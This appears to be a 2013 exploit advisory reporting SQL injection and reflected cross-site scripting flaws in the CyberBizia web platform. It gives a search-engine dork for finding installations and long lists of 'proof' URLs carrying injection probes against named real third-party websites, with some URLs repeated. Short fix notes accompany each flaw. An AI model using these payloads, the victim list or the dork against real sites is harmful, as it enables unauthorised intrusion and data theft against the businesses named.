#********************************************************************************
# Title : CyberBizia Multiple Vulnerabilities
#
# Software link : http://www.cyberbizia.com
#
# Exploit Author : Ashiyane Digital Security Team
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Powered by CyberBizia"
#
# Date: 2013/08/30
# --------------------------------------------------------------------
# Exploit 1 : SQL Injection
#
# Location : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection]
#
# Note : the proof requests only append a single quote to `mese`, so the value appears to reach the SQL statement unescaped.
#
# Fix : pass `mese` to the query as a bound parameter and reject any value that is not the expected number.
#
# Proof:
#
# http://www.advancedcardiology.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.artielavori.com/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.basketquartu.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.cdsdonnecagliari.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.digicsoft.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.costiauto.com/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.cdsdonnecagliari.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.basketquartu.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.immobiliarevacanze.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.magico-web.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.archibaleno.it/myasg/os.asp?elenca=mese&mese=1'
# --------------------------------------------------------------------
# Exploit 2 : Cross-Site Scripting (XSS)
#
# Location : [Target]/?Title=[xss]
#
# Note : the proof value starts with `"/>`, which suggests `Title` is reflected inside an HTML attribute without encoding.
#
# Fix : HTML-encode `Title` (including quotes) before writing it into the page.
#
# Proof:
#
# http://www.advancedcardiology.it/?Title="/>
#
# http://www.artielavori.com/?Title="/>
#
# http://www.basketquartu.it/?Title="/>
#
# http://www.cdsdonnecagliari.it/?Title="/>
#
# http://www.digicsoft.it/?Title="/>
#
# http://www.costiauto.com/?Title="/>
#
# http://www.cdsdonnecagliari.it/?Title="/>
#
# http://www.basketquartu.it/?Title="/>
#
# http://www.immobiliarevacanze.it/?Title="/>
#
# http://www.mozzarellina.com/?Title="/>
#
# http://www.archibaleno.it/?Title="/>
#
###################### discovered by : ACC3SS ######################